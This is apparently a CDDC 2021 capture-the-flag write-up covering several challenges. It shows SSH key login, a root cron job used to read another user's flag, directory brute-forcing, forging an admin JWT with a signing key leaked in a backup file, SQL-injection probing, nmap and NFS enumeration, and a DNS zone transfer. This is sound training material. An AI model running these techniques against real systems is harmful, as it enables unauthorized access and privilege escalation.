# CDDC 2021 ## Linux Rules the World! ### Opening the Gate Target IP: 13.213.192.83 File with SSH key: http://157.230.245.61/0x0302/nQE0XQ/m1/file.zip ``` # Note.txt Notice 1. As part of the ZIP file, you will find a text file that can be used to connect to the target machine. 2. Each one of the flags is the password for the next user. Your main goal is to access the last user account. 3. The flags are located in the user home folders. 4. The passphrase for the SSH key is: q1w2e3r4 ``` ``` chmod 700 bot1.key ssh -i bot1.key bot1@13.213.192.83 cat flag.txt ``` SSH key password `q1w2e3r4` given in `file.zip` Flag: `CDDC21{S$H_keYs_are_Be!ter_than_PaSSw0rds}` ## Scrambled Eggs ``` cat data | egrep CDDC21{.*} ``` Flag: `CDDC21{Th1s_!s_IT}` ## Another Path Tried to check cron jobs: `crontab -e` `* * * * * root sudo cat /home/bot3/flag.txt > /run/screen/result` ## Web Takedown Part 1 ### Integrity Target url: http://122.248.246.76/8NR7Z67K Analysing cookie: `token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwibmFtZSI6IkN5YmVyQm90MyIsImlhdCI6IiAxNjIzODY3NDg3IiwiaXNfYWRtaW4iOiIwIn0.YBMeZkOWZOju82ZKeMoIXHi425jocpr0axMm8MlASVE` Found note in `staged.js`: ``` /* John, the next generation platform is going to be deployed next week. Make sure to review all the backup files in "/stage-03-03/". */ ``` `dirsearch -u http://122.248.246.76/8NR7Z67K/stage-03-03` Found http://122.248.246.76/8NR7Z67K/stage-03-03/index.php~: ``` "admin" "name"=> "CyberBot3" "iat"=>" 1623867487" "is_admin" => "0" ); $key = "sup3rw0rldk3y"; $jwt = JWT::encode($payload, $key); setcookie("token", $jwt); if (isset($_POST['sub']) && !empty($_POST['username'])){ if ($_POST['username'] != "admin"){ echo " The ".$user." is doesnt exsits "; } else { echo " The password for ".$user." is incorrect. "; } } ?> ``` Modify JWT: ``` python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwibmFtZSI6IkN5YmVyQm90MyIsImlhdCI6IiAxNjIzODY3NDg3IiwiaXNfYWRtaW4iOiIwIn0.YBMeZkOWZOju82ZKeMoIXHi425jocpr0axMm8MlASVE -T -S hs256 -p sup3rw0rldk3y ``` New JWT token after changing `is_admin = "0"` to `is_admin = "1"`: `eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwibmFtZSI6IkN5YmVyQm90MyIsImlhdCI6IiAxNjIzODY3NDg3IiwiaXNfYWRtaW4iOiIxIn0.LFqk2Y2nJ4cGTNIr7a0iBdnAZ3WNvy34Z4_eHq0mumk` Flag: `CDDC21{jWT_h4S_b33N_pwN3DD}` ### Bypass Password field does not allow space. When keying in normal password, page shows `No row`. Empty form no feedback. `POST` request returns 500 when `'` is in password field. ## Post-Mortem ### Look Closer Decode text file from base64 ## Going Active ### UnKnown Port 666 Unzip`.zip`, extract `.tar` Flag: `CDDC21{Y0u_Figu4ed_IT_0UT}` ### Mounting ``` $ nmap 178.128.118.134 -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-24 16:04 +08 Nmap scan report for 178.128.118.134 Host is up (0.012s latency). Not shown: 994 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 2049/tcp open nfs_acl 3 (RPC #100227) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel $ showmount -e 178.128.118.134 Export list for 178.128.118.134: /var/nfs/backup * ``` ## Let's Go Hunting ### Broken System ``` dig axfr cryptit.biz @ns2.cryptit.biz ``` Flag: `CDDC21{_10x_f0r_yOur_Serv!ce_}` ### Found https://www.youtube.com/watch?v=XP5DJ55LXRM with email ` teslareactor7@gmail.com` ## Behind the Mask ### Light Domain name: `7C60.LOCAL` ## Break It Down ### Never Test XOR on data via rolling window to find candidates. Key: 111970 Flag: `CDDC21{It_@ll_$tarted_Th3n}`